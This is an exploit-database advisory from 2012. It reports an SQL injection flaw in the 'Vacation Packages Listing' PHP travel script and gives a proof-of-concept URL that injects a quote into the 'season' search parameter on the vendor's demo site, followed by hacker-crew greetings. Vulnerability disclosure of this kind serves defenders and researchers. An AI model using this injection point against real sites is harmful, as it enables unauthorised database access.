Vacation Packages Listing SQL Injection

2012.03.21
Credit: r45c4l
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: VACATION PACKAGES LISTING Sql Injection # Date: 19/03/2012 # Author: r45c4l # Script url: http://www.classifiedsgeek.com/vacation-packages/ # Version: N/A # CVE : () :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Product Description : Vacation packages listing is a PHP travel script & travel deals software for travel agencies and tour operators to manage dynamic vacation packages and travel deals. Product Cost : $119.00 ===============================Exploit================================================= ---ICW--- [ EXPL0!T ] SQL Injection Note: Tested on demo site p0c - http://www.classifiedsgeek.com/vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2' =========================================================================== Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Hoody, sam, Sai Satish All members of ICW, AH, G4H and darkc0de and all Indian Hackers Special Greetz to : b4ltazar and s1nn3r # Email: infosecpirate@gmail.com === End () ====

References:

http://www.classifiedsgeek.com/vacation-packages/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top